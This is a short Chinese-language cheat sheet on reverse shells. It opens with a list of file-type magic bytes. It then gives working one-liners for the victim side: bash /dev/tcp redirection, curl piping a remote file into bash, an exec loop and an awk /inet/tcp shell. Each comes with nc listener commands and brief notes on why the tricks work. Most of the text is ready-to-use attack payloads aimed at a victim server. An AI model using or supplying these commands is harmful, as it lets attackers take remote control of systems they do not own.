反弹shell

xxxxxxxxxx JPEG (jpg),文件头:FFD8FFPNG (png),文件头:89504E47GIF (gif),文件头:47494638TIFF (tif),文件头:49492A00Windows Bitmap (bmp),文件头:424DCAD (dwg),文件头:41433130Adobe Photoshop (psd),文件头:38425053Rich Text Format (rtf),文件头:7B5C727466XML (xml),文件头:3C3F786D6CHTML (html),文件头:68746D6C3EEmail [thorough only] (eml),文件头:44656C69766572792D646174653AOutlook Express (dbx),文件头:CFAD12FEC5FD746FOutlook (pst),文件头:2142444EMS Word/Excel (xls.or.doc),文件头:D0CF11E0MS Access (mdb),文件头:5374616E64617264204AWordPerfect (wpd),文件头:FF575043Adobe Acrobat (pdf),文件头:255044462D312EQuicken (qdf),文件头:AC9EBD8FWindows Password (pwl),文件头:E3828596ZIP Archive (zip),文件头:504B0304RAR Archive (rar),文件头:52617221Wave (wav),文件头:57415645AVI (avi),文件头:41564920Real Audio (ram),文件头:2E7261FDReal Media (rm),文件头:2E524D46MPEG (mpg),文件头:000001BAMPEG (mpg),文件头:000001B3Quicktime (mov),文件头:6D6F6F76Windows Media (asf),文件头:3026B2758E66CF11MIDI (mid),文件头:4D5468647z(zip)文件头:37 7A BC AF 27 1C···​bash

html反弹shell

通过给目标靶机传入一个1.html的文件

1
bash -c 'bash -i >& /dev/tcp/yourip/port 0>&1'

为什么内容会多一个bash -c
因为在某些服务器中,他容易重定向模糊,导致反弹shell失败。
使用这个可以解决此类问题

bash反弹shell

这种反弹shell的条件是最少的,也是最简单的,同时也是最少见的。(你都拿到命令控制界面的显示框了,还弹shell干啥)或许是往里面写文件呢。
开始正题
在自己服务器开启监听端口

1
2
3
nc -lvvp port
nc -lvp port
两个命令都可,一个不行换另一个

被攻击者服务器bash命令

1
bash -i >& /dev/tcp/yourip/port 0>&1

curl反弹shell

本质上适合html一样
无非是利用被攻击者服务器curl命令执行

1
curl yourip/file|bash

使被攻击者的服务器主动访问你的文件并且执行内部bash命令
从而达到反弹shell的目的

Exec反弹shell

被攻击者服务器执行命令

1
exec 5<>/dev/tcp/192.168.123.192/19111;cat <&5 | while read line; do $line 2>&5 >&5; done

攻击者服务器执行命令

1
2
3
nc -lvvp port
nc -lvp port
开启端口

Awk反弹shell

和上面的Exec反弹shell差不多
无非是受害者命令变了

1
awk 'BEGIN {s = "/inet/tcp/0/192.168.123.192/19111"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

正常的bash反弹shell服务端结束了shell(ctrl+c取消),shell客户端(受害者)也随之结束建立连接的命令,但是awk再次监听端口时仍旧能连接(也就是客户端一直保持连接状态除非手动在客户端结束,这样的好处是即使服务端断开连接不用在受害者主机中再次执行命令直接nc接shell即可)

—后续更新ing